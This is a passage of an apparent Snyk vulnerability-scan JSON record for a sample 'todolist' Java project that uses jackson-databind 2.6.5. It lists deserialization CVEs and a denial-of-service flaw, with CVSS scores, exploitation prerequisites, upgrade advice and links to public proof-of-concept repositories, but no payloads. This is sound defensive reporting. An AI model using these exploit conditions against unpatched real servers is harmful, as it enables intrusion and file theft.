data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub 